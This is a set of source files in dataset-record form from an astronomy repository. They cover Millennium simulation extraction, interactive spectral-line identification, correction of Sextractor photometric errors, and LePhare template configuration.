"97c1076a69507a25597dea565fa310cc4023b083", "content_id": "c8b9c63bfa9da52bd16ba78f0f2c14781f0ad6f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium3.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_2_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5272626876831055, "alphanum_fraction": 0.5335593819618225, "avg_line_length": 33.489261627197266, "blob_id": "f90e390ae421b0513792d1867d26a25df00c3d1c", "content_id": "8974b86f9cbcea20a384a0c26852e909abd030f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14452, "license_type": "no_license", "max_line_length": 78, "num_lines": 419, "path": "/python/learn/id_spec.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nimport scipy,pickle,numpy\nimport numpy as np\ntry:\n import matplotlib.pyplot as plt\nexcept:\n import pylab as plt\nimport special_functions as sf\nfrom scipy import ndimage\nfrom mostools import specfit as spf\nSTANDARD = None\n\nclass IDSpectrum:\n \"\"\"\n IDSpectrum class for identification of spectral lines starting with an\n initial model of the spectrum.\n \"\"\"\n def __init__(self, arc,sky,wave,standardlines):\n \"\"\" Plot data \"\"\"\n self.arc = plt.plot(wave,arc,c='b')[0]\n self.sky = plt.plot(wave,sky,c='g')[0]\n self.canvas = self.arc.get_figure().canvas\n self.ax = self.arc._axes\n self.xdata = self.arc.get_xdata().copy()\n self.start = [arc.copy(),sky.copy(),wave.copy(),standardlines.copy()]\n\n self.standard = standardlines\n\n \"\"\" Get metadata (ie line locations) for arcs \"\"\"\n arc = self.arc.get_ydata()\n self.arcpeaks = ndimage.maximum_filter(arc,9)\n tmp = scipy.sort(arc)\n thresh = tmp[int(tmp.size*0.95)]\n cond = (arc==self.arcpeaks)&(arc>thresh)\n self.arcpeaks = scipy.where(cond)[0]\n #tmpX = numpy.arange(arc.size)*1.\n #self.arcpeaks = spf.get_lines(tmpX,arc)\n self.arcsel = self.arcpeaks*0\n self.arclines = []\n for peak in self.arcpeaks:\n l = plt.axvline(self.xdata[peak],c='k')\n self.arclines.append(l)\n\n sky = self.sky.get_ydata().copy()\n bg = ndimage.percentile_filter(sky,25,51)\n self.skypeaks = ndimage.maximum_filter(sky,9)\n tmp = scipy.sort(sky)\n thresh = tmp[int(tmp.size*0.99)]\n cond = (sky==self.skypeaks)&(sky>thresh)\n self.skypeaks = scipy.where(cond)[0]\n self.skysel = self.skypeaks*0\n self.skylines = []\n for peak in self.skypeaks:\n l = plt.axvline(self.xdata[peak],c='k',ls=':')\n self.skylines.append(l)\n\n self.spec = self.arc\n self.peaks = self.arcpeaks\n self.selected = self.arcsel\n self.lines = self.arclines\n\n \"\"\" Set useful flags \"\"\"\n self.domotion = False\n self.origx = None\n self.soln = None\n self.pick = False\n self.fitlines = None\n self.keyid = self.canvas.mpl_connect('key_press_event',self.key_press)\n\n self.connect()\n\n print \"\"\"\nMouse Controls:\n - left button drags single lines (rescales spectrum!)\n - middle button drags all lines (or exits from pan/zoom modes)\n - right button selects/deselects lines\nKeyboard Commands:\n g - add new line (use mouse to select the line)\n m - fit a polynomial solution to the ID'd lines\n w - write the current state to disk\n r - read a saved state\n n - reset to the initial state\n\"\"\"\n plt.show()\n\n def connect(self):\n \"\"\" Connect the mouse to the plot \"\"\"\n self.pressid = self.canvas.mpl_connect('button_press_event',\n self.on_press)\n self.moveid = self.canvas.mpl_connect('motion_notify_event',\n self.on_motion)\n self.offid = self.canvas.mpl_connect('button_release_event',\n self.on_release)\n\n def on_press(self,event):\n \"\"\"\n Deal with mouse button presses, including stretching, shifting,\n and line identification.\n \"\"\"\n \"\"\" Turn off plot tools \"\"\"\n if self.canvas.toolbar.mode!='':\n if event.button==2:\n self.canvas.toolbar.zoom()\n self.canvas.toolbar.pan()\n self.canvas.toolbar.pan()\n return\n\n self.xdata = self.spec.get_xdata().copy()\n if event.xdata==None or event.ydata==None: # Not in axes\n return\n\n ind = abs(self.xdata-event.xdata).argmin()\n indx = abs(self.peaks-ind).argmin()\n\n if abs(self.peaks-ind).min()>4.: # Not near any peaks\n return\n\n \"\"\" Select/unselect lines \"\"\"\n if event.button==3:\n if self.selected[indx]==1:\n self.selected[indx] = 0\n self.lines[indx].set_color('k')\n else:\n self.selected[indx] = 1\n self.lines[indx].set_color('r')\n plt.draw()\n return\n\n\n self.origx = self.xdata[self.peaks[indx]]\n self.lbound = self.xdata[0]\n self.lindx = 0\n for i in range(indx):\n if self.xdata[self.peaks[i]]>self.origx:\n break\n if self.selected[i]==1:\n self.lbound = self.xdata[self.peaks[i]]\n self.lindx = self.peaks[i]\n\n self.rbound = self.xdata[-1]\n self.rindx = -1\n for i in range(indx+1,self.peaks.size):\n if self.xdata[self.peaks[i]]<self.origx:\n continue\n if self.selected[i]==1:\n self.rbound = self.xdata[self.peaks[i]]\n self.rindx = self.peaks[i]\n break\n self.selected[indx] = 1\n self.indx = self.peaks[indx]\n self.domotion = True\n self.lines[indx].set_color('r')\n self.pick = False\n\n def on_motion(self, event):\n \"\"\" Controls the sliding/stretching of the spectra \"\"\"\n\n \"\"\"\n Ignore this if we aren't in slide/stretch mode (ie pressing the\n mouse button\n \"\"\"\n if self.domotion is False:\n return\n\n xdata = self.xdata.copy()\n \"\"\" Left mouse button is for stretching \"\"\"\n if event.button==1 and (event.xdata is not None) \\\n and (event.ydata is not None) and event.xdata>self.lbound \\\n and event.xdata<self.rbound:\n leftpts = self.xdata[self.lindx+1:self.indx+1].copy()\n left = scipy.linspace(leftpts[0],event.xdata,leftpts.size)\n rightpts = self.xdata[self.indx:self.rindx].copy()\n right = scipy.linspace(event.xdata,rightpts[-1],rightpts.size)[1:]\n xd = scipy.concatenate((left,right))\n xdata[self.lindx+1:self.rindx] = xd.copy()\n self.arc.set_xdata(xdata)\n self.sky.set_xdata(xdata)\n \"\"\" Middle mouse button is for sliding \"\"\"\n if event.button==2:\n offset = event.xdata-self.origx\n xdata = xdata + offset\n self.arc.set_xdata(xdata)\n self.sky.set_xdata(xdata)\n for i in range(self.arcpeaks.size):\n x = xdata[self.arcpeaks[i]]\n l = self.arclines[i]\n l.set_xdata([x,x])\n for i in range(self.skypeaks.size):\n x = xdata[self.skypeaks[i]]\n l = self.skylines[i]\n l.set_xdata([x,x])\n plt.draw()\n\n def on_release(self, event):\n \"\"\" If the mouse button is released, reset! \"\"\"\n if self.domotion:\n self.domotion = False\n self.xdata = self.spec.get_xdata().copy()\n plt.draw()\n\n def key_press(self,event):\n \"\"\"\n m is for fitting, p is for selecting new lines (or leaving select\n mode)\n \"\"\"\n if event.key.lower()=='m':\n self.do_fit()\n elif event.key.lower()=='a':\n if self.pick:\n self.pick = False\n self.canvas.mpl_disconnect(self.addid)\n self.connect()\n self.pick = False\n else:\n self.pick = True\n self.disconnect()\n print \"Choose the line to add (a to exit)\"\n self.addid = self.canvas.mpl_connect('button_press_event',\n self.add_line)\n elif event.key.lower()=='w':\n self.write()\n elif event.key.lower()=='r':\n self.read()\n elif event.key.lower()=='n':\n self.arc.remove()\n self.sky.remove()\n for i in self.lines:\n i.remove()\n a,b,c,d = self.start\n self.disconnect()\n self.canvas.mpl_disconnect(self.keyid)\n self.__init__(a,b,c,d)\n plt.draw()\n\n def do_fit(self):\n xdata = self.spec.get_xdata()\n ydata = self.arc.get_ydata()\n STANDARD = self.standard\n\n \"\"\" Get the centroided peaks of the selected lines \"\"\"\n print \"Finding line centroids...\"\n nlines = self.arcsel[self.arcsel==1].size\n fit = scipy.zeros(nlines*3+1)\n for i in range(nlines):\n fit[i*3+1] = ydata[self.arcpeaks[self.arcsel==1][i]]\n fit[i*3+2] = float(self.arcpeaks[self.arcsel==1][i])\n fit[i*3+3] = 1.\n ofit,chi = sf.ngaussfit(ydata,fit)\n xpeaks = []\n wpeaks = []\n x = xdata[self.arcpeaks[self.arcsel==1]]\n for i in range(nlines):\n if abs(fit[i*3+2]-ofit[i*3+2])>2.5:\n continue\n diff = abs(STANDARD-x[i])\n if diff.min()<5.:\n xpeaks.append(ofit[i*3+2])\n wpeaks.append(STANDARD[diff.argmin()])\n\n fitdata = scipy.empty((len(xpeaks),2))\n fitdata[:,0] = scipy.asarray(xpeaks)\n fitdata[:,1] = scipy.asarray(wpeaks)\n self.fitlines = fitdata[:,1].copy()\n ord = int(raw_input('Enter order of fit: '))\n fit = sf.lsqfit(fitdata,'polynomial',ord)\n self.soln = fit\n xdata = sf.genfunc(scipy.arange(xdata.size),0.,fit)\n self.sky.set_xdata(xdata)\n self.arc.set_xdata(xdata)\n for i in range(self.arcpeaks.size):\n x = xdata[self.arcpeaks[i]]\n l = self.arclines[i]\n l.set_xdata([x,x])\n for i in range(self.skypeaks.size):\n x = xdata[self.skypeaks[i]]\n l = self.skylines[i]\n l.set_xdata([x,x])\n plt.draw()\n def add_line(self,event):\n if self.canvas.toolbar.mode!='':\n if event.button==2:\n self.canvas.toolbar.zoom()\n self.canvas.toolbar.pan()\n self.canvas.toolbar.pan()\n return\n if event.xdata==None or event.ydata==None:\n print 'Invalid data'\n return\n xpos = event.xdata\n xdata = self.spec.get_xdata()\n ydata = self.spec.get_ydata()\n p = ndimage.maximum_filter(ydata,9)\n ind = abs(xdata-xpos).argmin()\n p = scipy.where((p==ydata))[0]\n if abs(p-ind).min()>5:\n print 'Not a line'\n return\n indx = p[abs(p-ind).argmin()]\n for i in self.peaks:\n if abs(indx-i)<9:\n print 'Too close to another line.'\n return\n if indx<5. or indx>xdata.size-6:\n print 'Too close to edge.'\n return\n peaks = scipy.arange(self.peaks.size+1)\n n = self.peaks[self.peaks<indx].size\n peaks[:n] = self.peaks[:n].copy()\n peaks[n] = indx\n peaks[n+1:] = self.peaks[n:].copy()\n sel = scipy.arange(peaks.size)\n sel[:n] = self.selected[:n].copy()\n sel[n] = 0\n sel[n+1:] = self.selected[n:].copy()\n self.peaks = peaks.copy()\n self.selected = sel.copy()\n xlim = self.ax.get_xlim()\n ylim = self.ax.get_ylim()\n if self.spec==self.arc:\n l = plt.axvline(xdata[indx],c='k')\n self.lines.insert(n,l)\n self.arcpeaks = self.peaks\n self.arcsel = self.selected\n self.arclines = self.lines\n else:\n l = plt.axvline(xdata[indx],c='k',ls=':')\n self.lines.insert(n,l)\n self.skypeaks = self.peaks\n self.skysel = self.selected\n self.skylines = self.lines\n self.ax.set_xlim(xlim)\n self.ax.set_ylim(ylim)\n plt.draw()\n self.canvas.mpl_disconnect(self.addid)\n self.connect()\n self.pick = False\n def disconnect(self):\n self.canvas.mpl_disconnect(self.pressid)\n self.canvas.mpl_disconnect(self.moveid)\n self.canvas.mpl_disconnect(self.offid)\n def write(self):\n oname = raw_input('Name of output file: ')\n f = open(oname,'w')\n xdata = self.spec.get_xdata()\n selected = self.arcsel\n peaks = self.arcpeaks\n soln = self.soln\n pickle.dump([xdata,selected,peaks,soln],f)\n f.close()\n print \"Writing Complete\"\n def read(self):\n oname = raw_input('Name of input file: ')\n try:\n f = open(oname,'r')\n xdata,selected,peaks,soln = pickle.load(f)\n f.close()\n except:\n print \"Could not read file: %s\"%oname\n return\n self.arc.set_xdata(xdata)\n self.arcpeaks = peaks\n self.arcsel = selected\n self.soln = soln\n for i in self.lines:\n i.remove()\n for i in range(len(self.lines)):\n del self.lines[0]\n for i in range(len(peaks)):\n c = 'k'\n if selected[i]==1:\n c = 'r'\n l = plt.axvline(xdata[peaks[i]],c=c)\n self.arclines.append(l)\n self.lines = self.arclines\n self.peaks = self.arcpeaks\n self.selected = self.arcsel\n plt.draw()\n\n\n\ndef id_spec(spec,model):\n import numpy\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.fmt_xdata = plt.FormatStrFormatter('%4.2f')\n ax.fmt_ydata = plt.FormatStrFormatter('%4.2f')\n from scipy import ndimage,interpolate\n\n STANDARD = model['lines']\n arcmodel = model['matched']\n arc = spec.copy()\n blue,red,scale = model['blue'],model['red'],model['scale']\n while (red-blue)/scale<arc.size:\n red += scale\n blue -= scale\n wave = numpy.arange(blue,red,scale)\n blue,red = model['blue'],model['red']\n model = interpolate.splev(wave,arcmodel)\n c = (wave<blue)|(wave>red)\n model[c] = model[~c].min()\n sci = arc*0.\n\n model /= model.max()/arc[numpy.isfinite(arc)].max()\n plt.plot(wave,model,c='gray')\n\n lines = []\n\n dr = IDSpectrum(arc,sci,wave[:arc.size],STANDARD)\n\n if dr.soln is None:\n dr.do_fit()\n xdata = dr.arc.get_xdata()\n ydata = dr.arc.get_ydata()\n wave = sf.genfunc(numpy.arange(xdata.size),0.,dr.soln)\n wide = ndimage.gaussian_filter(ydata,3.)\n match = interpolate.splrep(wave,ydata)\n wide = interpolate.splrep(wave,wide)\n model = {'wide':wide,'matched':match,'orig':[wave,ydata],\n 'lines':dr.fitlines,'red':red,'blue':blue,'scale':scale}\n return model,dr.soln\n" }, { "alpha_fraction": 0.6482310891151428, "alphanum_fraction": 0.6776670813560486, "avg_line_length": 43.831966400146484, "blob_id": "edacd1a104b8412e31d7b7a21bf9a39289549eba", "content_id": "9063cd326d4fdec7a61ad04491f2a4a8ab79fa79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10939, "license_type": "no_license", "max_line_length": 284, "num_lines": 244, "path": "/python/catalogue_utilities/sexerrors.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code finds more realistic error bars for the magnitudes in a catalogue produced with Sextractor\n# It does this by finding a beter estimate of the background variance, which accounts for pixel correlations\n# The empirical method is based on Liu et al. 2016 (arXiv:1612.01101v1) and references within\n##########################\n\n# IF THE CODE FAILS WITH ERROR \"ValueError: zero-size array to reduction operation maximum which has no identity\", EITHER RUN REPEATEDLY UNTIL IT WORKS, OR REDUCE THE VALUE OF success\n\n# VERY IMPORTANT TO REMEMBER THAT IN DUAL MODE SEXTRACTOR PRODUCES STD AND BACKGROUND MAPS ONLY FOR THE DETECTION IMAGE, SO I FIRST NEED TO RUN SEXTRACTOR IN SINGLE IMAGE MODE AND SAVE THOSE STD AND BACKGROUND MAPS INSTEAD. ALSO, SEXTRACTOR NEEDS TO BE RUN WITH A CUSTOM DEFAULT.PARAM\n\nimport numpy as np\nimport pylab as plt\nfrom astropy.io import fits\nfrom scipy.optimize import leastsq\n\n#image = \"FINALweighted_r_covernolens.fits\"\n#wht = \"FINALweighted_r_covernolens_matchg_wht.fits\"\n#segmentation = \"r_noconv_segm.fits\"\n#back = fits.open(\"r_noconv_backUSE.fits\")[0].data\n#std_im = fits.open(\"r_noconv_stdUSE.fits\")[0].data\n#savecat = \"r_detectin_ir_noconv_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"r_detectin_ir_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_i_covernolens.fits\"\n#wht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\n#segmentation = \"i_noconv_segm_detect_i.fits\"\n#back = fits.open(\"i_noconv_backUSE_detect_i.fits\")[0].data\n#std_im = fits.open(\"i_noconv_stdUSE_detect_i.fits\")[0].data\n#savecat = \"i_detectin_i_noconv_newisoerr.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"i_detectin_i_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\nimage = \"FINALweighted_i_covernolens.fits\"\nwht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\nsegmentation = \"i_noconv_segm_detect_ir.fits\"\nback = fits.open(\"i_noconv_backUSE_detect_i.fits\")[0].data\nstd_im = fits.open(\"i_noconv_stdUSE_detect_i.fits\")[0].data\nsavecat = \"i_detectin_ir_noconv_newisoerr.cat\"\nxpos,ypos,F,err,area = np.loadtxt(\"i_detectin_ir_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_u_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_u_covernolens_matchg_wht.fits\"\n#segmentation = \"u_segm.fits\"\n#back = fits.open(\"u_backUSE.fits\")[0].data\n#std_im = fits.open(\"u_stdUSE.fits\")[0].data\n#savecat = \"u_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"u_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_g_covernolens.fits\"\n#wht = \"FINALweighted_g_covernolens_wht.fits\"\n#segmentation = \"g_segm.fits\"\n#back = fits.open(\"g_backUSE.fits\")[0].data\n#std_im = fits.open(\"g_stdUSE.fits\")[0].data\n#savecat = \"g_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"g_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_r_covernolens_matchg.fits\"\n#wht = \"FINALweighted_r_covernolens_matchg_wht.fits\"\n#segmentation = \"r_segm.fits\"\n#back = fits.open(\"r_backUSE.fits\")[0].data\n#std_im = fits.open(\"r_stdUSE.fits\")[0].data\n#savecat = \"r_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"r_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_i_covernolens_matchg.fits\"\n#wht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\n#segmentation = \"i_segm.fits\"\n#back = fits.open(\"i_backUSE.fits\")[0].data\n#std_im = fits.open(\"i_stdUSE.fits\")[0].data\n#savecat = \"i_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"i_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_z_covernolens_matchg.fits\"\n#wht = \"FINALweighted_z_covernolens_matchg_wht.fits\"\n#segmentation = \"z_segm.fits\"\n#back = fits.open(\"z_backUSE.fits\")[0].data\n#std_im = fits.open(\"z_stdUSE.fits\")[0].data\n#savecat = \"z_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"z_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_Y_covernolens_matchg.fits\"\n#wht = \"FINALweighted_Y_covernolens_matchg_wht.fits\"\n#segmentation = \"Y_segm.fits\"\n#back = fits.open(\"Y_backUSE.fits\")[0].data\n#std_im = fits.open(\"Y_stdUSE.fits\")[0].data\n#savecat = \"Y_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"Y_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_J_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_J_covernolens_matchg_wht.fits\"\n#segmentation = \"J_segm.fits\"\n#back = fits.open(\"J_backUSE.fits\")[0].data\n#std_im = fits.open(\"J_stdUSE.fits\")[0].data\n#savecat = \"J_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"J_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_H_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_H_covernolens_matchg_wht.fits\"\n#segmentation = \"H_segm.fits\"\n#back = fits.open(\"H_backUSE.fits\")[0].data\n#std_im = fits.open(\"H_stdUSE.fits\")[0].data\n#savecat = \"H_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"H_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_Ks_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_Ks_covernolens_matchg_wht.fits\"\n#segmentation = \"Ks_segm.fits\"\n#back = fits.open(\"Ks_backUSE.fits\")[0].data\n#std_im = fits.open(\"Ks_stdUSE.fits\")[0].data\n#savecat = \"Ks_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"Ks_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n\n\nimg = fits.open(image)[0].data\ngain = fits.open(image)[0].header['gain']\nsegm = fits.open(segmentation)[0].data\naper_img = fits.open(segmentation) # will be used to register the apertures\nmed_std = np.median(std_im) # median value of the std computed by Sextractor across the image\naper = aper_img[0].data\nweight = fits.open(wht)[0].data\nNmax = 20\napertures_nr = 300\ngauss = np.zeros([Nmax,3]) # scale, mean and std for the fitted gaussians for N in range (1,20+1)\nplt.clf()\n\nfor N in range(1,Nmax+1): # sqrt(Npix)\n i = 1 # aperture number, including bad apertures\n success = 0 # number of successful apertures\n aper[aper != 0] = 0 # initialize with no apertures\n flux = np.array([]) # the flux measured in each aperture\n while i <= 3000 and success < apertures_nr:\n ok = True\n xcenter,ycenter = np.random.randint(low=0, high=img.shape[0], size=2)\n xlow = int(xcenter - N/2.0)\n xhigh = int(xcenter + N/2.0)\n ylow = int(ycenter - N/2.0)\n yhigh = int(ycenter + N/2.0)\n # for simplicity, make all apertures squares\n # do not use the aperture if it is not contained inside the image borders, or if it corresponds to non-zero segmentation map values, or if it overlaps with a previous aperture, or if it falls in a region with zero weight\n if xlow < 0 or ylow < 0 or xhigh > img.shape[0] or yhigh > img.shape[0] or np.max(segm[xlow:xhigh,ylow:yhigh] > 0) == True or np.max(aper[xlow:xhigh,ylow:yhigh] > 0) == True or np.max(weight[xlow:xhigh,ylow:yhigh] == 0) == True:\n ok = False\n if ok == True:\n aper[xlow:xhigh,ylow:yhigh] = 1\n # here I account for the fact that the noise is not uniform across the image, and I read it from the Sextractor noise map\n scaledflux = np.sum(img[xlow:xhigh,ylow:yhigh] - back[xlow:xhigh,ylow:yhigh]) * std_im[xcenter][ycenter] / med_std\n flux = np.append(flux,np.array(scaledflux))\n success += 1\n i += 1\n # fitting gaussian to the data\n fitfunc = lambda p, x: p[0]*np.exp(-0.5*((x-p[1])/p[2])**2)\n errfunc = lambda p, x, y: (y - fitfunc(p, x))\n init = [100.0, -1, 5]\n ydata,xdatabin = np.histogram(flux)\n bin = xdatabin[1]-xdatabin[0]\n xdata = np.linspace(xdatabin[0]+bin/2.0,xdatabin[len(xdatabin)-1]-bin/2.0,len(xdatabin)-1)\n out = leastsq( errfunc, init, args=(xdata, ydata))\n c = out[0]\n c[2] = np.abs(c[2]) # because by definition, c[2] may be negative\n gauss[N - 1] = c\n #plt.plot(xdata, fitfunc(c, xdata))\n #plt.hist(flux)\n #plt.title(r'$N = %.0f\\ A = %.3f\\ \\mu = %.3f\\ \\sigma = %.3f\\ $' %(N,c[0],c[1],c[2]));\n #plt.show()\n#aper_img.writeto(\"check_aper.fits\",clobber=True)\n\n# fitting the power law\nstd_0 = gauss[0][2]\nfitfunc = lambda p, x: std_0 * (x ** p[0])\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [1.5]\nydata,xdata = gauss[:,2], range(1,Nmax+1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nplt.yscale('log')\nplt.plot(xdata, fitfunc(c, xdata))\nplt.plot(xdata, fitfunc(np.array([1]), xdata),'r--')\nplt.plot(xdata, fitfunc(np.array([2]), xdata),'r--')\nplt.scatter(xdata,ydata)\nplt.xlabel('N')\nplt.ylabel('$\\sigma$ [counts/s]')\nplt.xlim(0,Nmax + 1)\nplt.title(r'$\\sigma = %.3f\\ \\beta = %.3f\\ $' %(std_0,c[0]))\nplt.show()\n\n# correct the errors\nstd = np.zeros(len(xpos))\nerr_recover = np.zeros(len(xpos))\nerr_new = np.zeros(len(xpos))\nfor i in range(len(xpos)):\n std[i] = std_im[int(ypos[i])][int(xpos[i])] # switched xpos and ypos because this is how fits images are read to the array\n err_recover[i] = 1.0857 * np.sqrt(area[i] * (std[i] ** 2) + F[i]/gain) / F[i]\n err_new[i] = 1.0857 * np.sqrt((std[i] ** 2) * (area[i] ** c[0]) + F[i]/gain) / F[i]\n\nz=np.linspace(0,0.3,1000)\nplt.plot(z,z)\nplt.xlim(0,0.5)\nplt.ylim(0,0.5)\nplt.scatter(err,err_recover,label='recovered')\nplt.scatter(err,err_new,color=\"red\",label='corrected')\nplt.xlabel('sextractor error')\nplt.ylabel('computed error')\nplt.legend()\nplt.show()\n\n# use the maximum errors between original and recalculated, and replace the NaN values\nerr_recover[err_recover > 99] = 99.0000\nerr_new[err_new > 99] = 99.0000\nerr_recover = np.maximum(err,err_recover)\nerr_new = np.maximum(err,err_new)\nerr_recover[np.isnan(err_recover)] = 99.0000\nerr_new[np.isnan(err_new)] = 99.0000\nnp.savetxt(savecat,err_new,fmt='%.4f')\n\n# below is for fitting power law with 2 parameters\n'''\n# fitting the power law\nstd_0 = gauss[0][2]\nfitfunc = lambda p, x: std_0 * p[0] * (x ** p[1])\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [1,1.5]\nydata,xdata = gauss[:,2], range(1,Nmax+1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nplt.yscale('log')\nplt.plot(xdata, fitfunc(c, xdata))\nplt.plot(xdata, fitfunc(np.array([1,1]), xdata),'r--')\nplt.plot(xdata, fitfunc(np.array([1,2]), xdata),'r--')\nplt.scatter(xdata,ydata)\nplt.xlabel('N')\nplt.ylabel('RMS [counts/s]')\nplt.xlim(0,Nmax + 1)\nplt.title(r'$\\sigma^2 = %.3f\\ \\alpha = %.3f\\ \\beta = %.3f\\ $' %(std_0**2,c[0],c[1]))\nplt.show()\n\n# read the Sextractor catalogue and correct the errors\nID,xpos,ypos,F,err,area = np.loadtxt('r.cat',usecols=[0,1,2,4,7,8],unpack=True)\nvar = np.zeros(len(xpos))\nerr_recover = np.zeros(len(xpos))\nerr_new = np.zeros(len(xpos))\nfor i in range(len(xpos)):\n var[i] = rms[int(ypos[i])][int(xpos[i])] # switched xpos and ypos because this is how fits images are read to the array\n err_recover[i] = 1.0857 * np.sqrt(area[i] * var[i] + F[i]/gain)/F[i]\n err_new[i] = 1.0857 * np.sqrt(var[i] * (c[0] ** 2) * (area[i]**c[1]) + F[i]/gain)/F[i]\n '''\n" }, { "alpha_fraction": 0.6509542465209961, "alphanum_fraction": 0.7054495215415955, "avg_line_length": 64.89393615722656, "blob_id": "41706f1d0aded78024547bef2fd10a087091913c", "content_id": "f3cea212725c531d97beadeadd24fcd8bf8e29f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4349, "license_type": "no_license", "max_line_length": 263, "num_lines": 66, "path": "/python/config_utilities/runconfig.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#! /bin/sh\n#Builds the template libraries and puts them in $LEPHAREWORK/\n\nLEPHAREDIR=$HOME/lephare_dev\nPARA=$HOME/lephare_dev/config/lephare_CFHTLenS.para\n\nLEPHAREWORK=$HOME/lephare_dev/work\n\nexport LEPHAREDIR\nexport LEPHAREWORK\n\nif [ ! -d $LEPHAREWORK ]; then\n echo \"creating $LEPHAREWORK...\"\n mkdir $LEPHAREWORK\n mkdir $LEPHAREWORK/filt\n mkdir $LEPHAREWORK/lib_mag\n mkdir $LEPHAREWORK/lib_bin\nfi\n\n#Filter transmission curves\n$LEPHAREDIR/source/filter -c $PARA -FILTER_LIST cfht/megacam/CFHTLS_u.pb,cfht/megacam/CFHTLS_g.pb,cfht/megacam/CFHTLS_r.pb,cfht/megacam/CFHTLS_i.pb,cfht/megacam/CFHTLS_y.pb,cfht/megacam/CFHTLS_z.pb\n#Galaxy templates -------------------------------#\n#CWW\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW -GAL_SED $LEPHAREDIR/sed/GAL/CWW_KINNEY/CWW_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW -GAL_LIB_OUT MAG_CWW -MOD_EXTINC 3,10 -EB_V 0.,0.05,0.1,0.15,0.2,0.25,0.3\n\n#NOT FOUND:\n#CWW - improved Ilbert et al. (2006) templates + optimized for CFHTLS and interpolated\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_CFHTLS -GAL_SED $LEPHAREDIR/sed/GAL/CFHTLS_WIDE/CE_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW_CFHTLS -GAL_LIB_OUT MAG_CWW_CFHTLS -MOD_EXTINC 40,70 -EXTINC_LAW SMC_prevot.dat -EB_V 0.000,0.05,0.1,0.15,0.2,0.25\n\n#NOT FOUND:\n#CWW - same as obove but slightly more recent\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_CFHTLS_NEW -GAL_SED $LEPHAREDIR/sed/GAL/PHOTO_230506/CE_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA 